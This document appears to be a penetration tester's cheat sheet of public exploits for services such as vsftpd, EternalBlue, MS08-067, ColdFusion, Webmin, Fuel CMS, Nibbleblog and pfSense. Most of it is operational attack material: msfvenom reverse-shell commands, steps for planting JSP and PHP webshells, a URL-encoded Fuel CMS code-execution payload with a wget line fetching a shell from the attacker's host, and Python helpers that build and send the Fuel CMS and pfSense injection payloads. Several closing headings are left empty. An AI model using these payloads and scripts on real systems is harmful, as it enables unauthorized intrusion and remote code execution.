Public Exploits
distccd v1
Port: 3632
Description:
When distccd is not configured to restrict which hosts may connect to its port (TCP 3632), remote attackers can execute arbitrary commands as the distccd user by submitting crafted compile jobs.
Metasploit Exploit: YES (exploit/unix/misc/distcc_exec)
VSFTPD v2.3.4
Backdoor Opens Port: 6200
Description:
Logging in to FTP with a username that contains " :) " triggers the backdoor, which binds a shell on TCP port 6200 (no banner or prompt; just send commands).
Metasploit Exploit: YES (exploit/unix/ftp/vsftpd_234_backdoor)
Kernel Exploits
Linux 2.6.32 < 3.x (CentOS - x86)
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - udev
Requires:
The PID of the udevd netlink socket (listed in /proc/net/netlink; usually the udevd PID minus 1), passed as the first argument.
A file /tmp/run containing the payload, marked executable: the exploit runs /tmp/run as root.
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) - 'Mempodipper' Local Privilege Escalation
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW'
Link: https://www.exploit-db.com/exploits/47080
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)
Link: https://www.exploit-db.com/exploits/45010
If the target has no gcc, compile on your own machine for the target's architecture and libc (or link statically with -static so the libc version does not matter) and copy the binary over.
Elastix 2.2
Default Credentials :
admin:admin
If the browser refuses the self-signed certificate, intercept with Burp.
Identify available extensions via PBX enumeration if the line is busy.
MS17-010 [EternalBlue]
EXPLOIT 1
Reference: https://outrunsec.com/2020/07/26/cyberseclabs-eternal-walkthrough/
EXPLOIT 2
Download mysmb.py, which the exploit imports; the download location is given in the exploit's header.
Use msfvenom to create a reverse shell payload.
Edit the exploit to add the authentication credentials and the reverse shell payload. [Guest :: <blank password>]
Exploit: https://www.exploit-db.com/exploits/42315
searchsploit -m 42315
Generate Payload
Exploit Modification
In exploit(), modify the two commented-out smb_send_file and service_exec lines:
Uncomment both lines.
Point smb_send_file at the payload file to send and its destination path on the target.
Point service_exec at the command that runs that payload on the target.
Add Authentication Credentials
Set USERNAME = 'guest' with an empty PASSWORD for anonymous login.
If the above does not work, try the script's default of an empty username, USERNAME = ''.
EXPLOIT 3
Payload:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f exe > eternalblue.exe
Set up a listener on the LPORT used in the payload (4444 here).
Usage:
python send_and_execute.py 10.10.10.4 ~/Desktop/eternalblue.exe
MS08-067
Create the shellcode with msfvenom using these options:
-b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" : the bad characters to avoid (taken from the comments in the Python exploit).
-f py : output in Python format (the exploit's examples use C format and paste it in slightly differently; either works).
-v shellcode : name the output variable shellcode instead of the default buf, so it matches the name used in the exploit.
Paste the generated shellcode into the script, replacing the default.
The exploit also needs the target's Windows version and language pack, because it selects its return address from these.
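Two things worth checking before pasting the blob into the exploit: that the encoder really avoided every byte in the -b list, and that the variable layout matches what the script expects. The helpers below do both; they are an added example for this page, not part of the MS08-067 exploit or of msfvenom, and the demo bytes are constructed rather than real payload output.

```python
"""Check msfvenom shellcode against the MS08-067 exploit's bad-character
list and lay it out the way '-f py -v shellcode' does.

Added example for this page; it is not part of the MS08-067 exploit
script or of msfvenom. The demo bytes are constructed, not real payload
output. The generation command the flags above belong to is:

  msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread \\
      -b "\\x00\\x0a\\x0d\\x5c\\x5f\\x2f\\x2e\\x40" -f py -v shellcode
"""

# The -b list from the comments in the Python exploit.
BADCHARS = b"\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40"


def find_badchars(shellcode: bytes, badchars: bytes = BADCHARS) -> list:
    """(offset, byte) for every bad character in the blob. An empty list
    means the encoder honoured the -b list; anything else will break the
    path string the exploit embeds the shellcode in."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def to_py_var(shellcode: bytes, name: str = "shellcode", width: int = 16) -> str:
    """Format bytes like 'msfvenom -f py -v <name>': a header line followed
    by 16-byte chunks of \\xNN escapes appended to a bytes literal."""
    lines = [f'{name} =  b""']
    for i in range(0, len(shellcode), width):
        chunk = "".join(f"\\x{b:02x}" for b in shellcode[i:i + width])
        lines.append(f'{name} += b"{chunk}"')
    return "\n".join(lines)


def from_py_var(text: str) -> bytes:
    """Inverse of to_py_var, so a blob already pasted into the exploit can
    be re-checked against the bad-character list."""
    out = bytearray()
    for line in text.splitlines():
        _, _, literal = line.partition('b"')
        out += bytes.fromhex(literal.rstrip('"').replace("\\x", ""))
    return bytes(out)


if __name__ == "__main__":
    # Constructed demo: a short NOP sled, a few harmless instructions and
    # one deliberately bad byte (0x0a) so the check has something to report.
    demo = b"\x90\x90\x90\x31\xc0\x50\x0a"
    print(to_py_var(demo))
    print("bad characters:", find_badchars(demo))  # [(6, 10)]
```

Run from_py_var over the variable already in the script if you suspect a paste went wrong; a non-empty find_badchars result means the target will never reach the payload, so regenerate rather than hunt for a different return address.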
ColdFusion 8
LFI
The LFI discloses the administrator password hash; grab it and crack it to log in.
RCE through Scheduled Task:
Login -> Debugging&Logging -> Scheduled Tasks.
The scheduled task setup lets you fetch a file from a web server and save the output to a local path, which is enough to drop a JSP shell into the web root.
Default location mapping from:
http://10.11.1.10/CFIDE/administrator/reports/index.cfm > ColdFusion Mappings
Create a reverse shell in JSP and host it on our server.
Set the task config below:
Task Name: Shell
URL: the web server hosting the JSP shell
Check the box "Save output to a file"
File: C:\ColdFusion8\wwwroot\CFIDE\shell.jsp
After submitting, run the task on demand under Actions.
Set up a listener and browse to
http://10.10.10.18:8080/CFIDE/shell.jsp
| --- CVE-2009-2265 --- |
- RCE through File Upload:
- Manual Exploitation
Use Burp Suite to forward the request.
The payload should be in JSP format.
This creates a file called 'exp.cfm' in the '/userfiles/files/' directory on the server.
| --- CVE-2018-15961 --- |
Metasploit Module: https://packetstormsecurity.com/files/151095/Adobe-Coldfusion-11-CKEditor-Arbitrary-File-Upload.html
Webmin
File Disclosure [LFI]
http://<url>/unauthenticated/ followed by ..%01 repeated 40 times and then the absolute path of the file to read (for example /etc/passwd). The %01 byte after each .. defeats Webmin's directory-traversal filtering while the filesystem still resolves the path.
Fuel CMS 1.4 RCE
Fuel CMS 1.4 evaluates the filter parameter of /fuel/pages/select as PHP code, which gives unauthenticated RCE.
Send the request through Burp (or read the raw response): the command output is printed before the page HTML, so it only shows up in the source, not in the rendered page.
Payload:
https://<TARGET-IP>/fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27<insert code here >%27%29%2b%27
For Example, within Burp: /fuel/pages/select?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami;cat /etc/passwd%27%29%2b%27
To get a Reverse shell:
Run this as the command inside the payload's $a('...') call; -O (capital) is the output-file flag, lowercase -o would only redirect wget's log. The file lands in the PHP process's working directory, normally the web root:
wget http://<attackers-IP>/webshell.php -O shell.php
Set up a listener and access
http://<target-IP>/shell.php
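The encoded filter value above is hard to read and easy to mis-edit by hand. As an added example for this page (not Fuel CMS code and not a public exploit script), the helpers below decode it, build an equivalent payload for any command, and cut the command output out of the response; the base URL and the use of urllib are assumptions.

```python
"""Build the Fuel CMS 1.4 'filter' code-evaluation payload for any command
and pull the command output out of the response.

Added example for this page; it is not Fuel CMS code or a public exploit
script. The base URL and the use of urllib are assumptions. The PHP
expression is the one the URL-encoded payload above decodes to.
"""
import ssl
from urllib.parse import quote, unquote
from urllib.request import urlopen

# The encoded payload above decodes to this PHP (CMD is the command):
#   '+pi(print($a='system'))+$a('CMD')+'
# The quotes close the string the filter value lands in, so eval() runs
# print($a='system') (which sets $a) and then $a('CMD'), i.e. system('CMD').
PHP_TEMPLATE = "'+pi(print($a='system'))+$a('{cmd}')+'"


def build_filter(cmd: str) -> str:
    """URL-encoded filter value. Every non-alphanumeric byte is escaped, so
    '+' arrives as the PHP operator and is not turned into a space."""
    return quote(PHP_TEMPLATE.format(cmd=cmd), safe="")


def decode_filter(encoded: str) -> str:
    """Show what an encoded payload actually says (unquote keeps '+')."""
    return unquote(encoded)


def extract_output(body: str, marker: str = "<!DOCTYPE") -> str:
    """system() writes straight into the response before the page renders,
    so the output is everything before the page's own doctype. The output
    may appear twice; keep one copy when the two halves match."""
    head = body.split(marker, 1)[0]
    half = len(head) // 2
    if head and len(head) % 2 == 0 and head[:half] == head[half:]:
        head = head[:half]
    return head


def run(base_url: str, cmd: str, timeout: float = 10.0) -> str:
    """GET /fuel/pages/select?filter=<payload> and return the command output.
    Needs a live target; the helpers above are testable offline."""
    url = f"{base_url}/fuel/pages/select?filter={build_filter(cmd)}"
    ctx = ssl._create_unverified_context()  # lab targets use self-signed certs
    with urlopen(url, timeout=timeout, context=ctx) as resp:
        return extract_output(resp.read().decode(errors="replace"))


if __name__ == "__main__":
    # Assumed target; replace with the real one.
    print(run("https://10.10.10.10", "whoami;cat /etc/passwd"))
```

build_filter escapes everything, including the letters the page's payload hex-encodes, so the two forms are interchangeable server-side; the important part is that '+' is sent as %2B, because a literal '+' in a query string decodes to a space and breaks the PHP expression.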
DotNetNuke [DNN]
Nibbleblog 4.0.3
Pre-requisites:
Admin credentials
Webshell [PHP]
Reference: CVE-2015-6967
Exploitation
Log in to Nibbleblog and open the plugins page:
http://<IP>/nibbleblog/admin.php?controller=plugins
Upload the PHP reverse shell through the My Image plugin's configuration:
http://<IP>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
Ignore the errors shown after upload; the file is written anyway, renamed to image.php.
Access the webshell at its default location:
http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php
pfSense
The vulnerability arises because the '|' character is not filtered in the database parameter of status_rrd_graph_img.php, so a shell command can be chained after the expected queues value. Target URL (the + is a URL-encoded space):
<URL>/status_rrd_graph_img.php?database=queues;printf+'<octal payload>'|sh
Pre-requisites:
Admin credentials [Default admin :: pfsense]
Exploitation
The Python payload is converted to octal escapes, a few characters that break the request are removed, the result is saved to a temp file on the target, and the server's PHP executes it through printf ... | sh.
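The octal step is what makes the injection work: printf turns \NNN escapes back into bytes, so the payload inside the single quotes never contains a quote, space or shell metacharacter that the request would mangle. As an added example for this page (not the published exploit's code), the encoder, its inverse for checking the round trip, and the URL builder; the host, scheme and sample command are assumptions, and the request still needs an authenticated admin session.

```python
"""Encode a shell payload as printf octal escapes for the pfSense
status_rrd_graph_img.php 'database' injection and assemble the URL.

Added example for this page; it is not the published exploit's code. The
host, the https scheme and the sample command are assumptions. The
injection shape, database=queues;printf '<octal>'|sh, is the one shown
above, and the request must carry an authenticated admin session cookie.
"""
from urllib.parse import quote


def to_printf_octal(payload: bytes) -> str:
    """One \\NNN escape per byte, always three digits so printf cannot merge
    an escape with a digit that follows it. The result contains only
    backslashes and digits: no quotes, spaces or shell metacharacters, which
    is what lets an arbitrary command ride inside the single quotes."""
    return "".join(f"\\{b:03o}" for b in payload)


def from_printf_octal(encoded: str) -> bytes:
    """Decode the escapes as printf would; used to verify the round trip."""
    return bytes(int(digits, 8) for digits in encoded.split("\\")[1:])


def build_url(host: str, payload: bytes, scheme: str = "https") -> str:
    """database=queues;printf '<octal>'|sh, URL-encoded. The leading
    'queues' keeps the value looking like a legitimate database name; the
    unfiltered '|' hands printf's output to sh."""
    injected = f"queues;printf '{to_printf_octal(payload)}'|sh"
    return f"{scheme}://{host}/status_rrd_graph_img.php?database=" + quote(injected, safe="")


if __name__ == "__main__":
    # Constructed sample command; swap in the real payload.
    cmd = b"id > /tmp/pwned"
    print(to_printf_octal(cmd))
    print(build_url("10.10.10.60", cmd))
```

Because every byte is escaped, the payload can hold anything, including the quotes and redirections a reverse shell one-liner needs; the only size cost is four characters per byte, which matters for the GET URL length but not for correctness.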
Davfs2 1.4.6 Local Priv Esc
Hadoop Yarn RCE
Contents of test.json
Apache NiFi RCE
Exploit Script